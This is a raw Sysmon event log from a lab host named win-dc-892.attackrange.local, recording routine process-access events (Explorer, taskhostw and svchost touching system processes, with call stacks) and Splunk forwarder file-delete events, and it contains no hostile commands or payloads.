12:02:28.611{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006402Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.611{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\Syst
em32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006401Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.611{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006400Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.595{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6d1f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+68be|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6966|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6ab5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000006399Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.595{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d4e3|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d7a9|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+bae7e|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006398Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.595{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+bae7e|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006397Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.595{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+bae7e|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006396Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.595{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12a3cc|C:\Windows\System32\TwinUI.dll+b60d4|C:\Windows\System32\TwinUI.dll+b1e1b|C:\Windows\System32\TwinUI.dll+d206a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000006395Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.595{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006394Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.595{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006393Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.564{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006392Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.564{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006391Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.564{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000006390Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.284{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB430117CBD977FB1E62A892A093E230,SHA256=A3D34CFDE4BC46467B122B40EA3822CF44F5DD52263AB5AF8AFA2EC3C40E82B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000006389Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.237{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B125B5C6EC14FD580930394900721F3,SHA256=4D4CEB1AC2A63ED715BA9DF21E13297B1B2CDB6C2B9C4478D7A44A0C0442F06B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006388Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.175{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006387Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.175{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006386Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.175{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006385Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.175{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006384Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.175{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006383Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.175{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006382Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.175{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006381Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006380Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006379Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006378Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
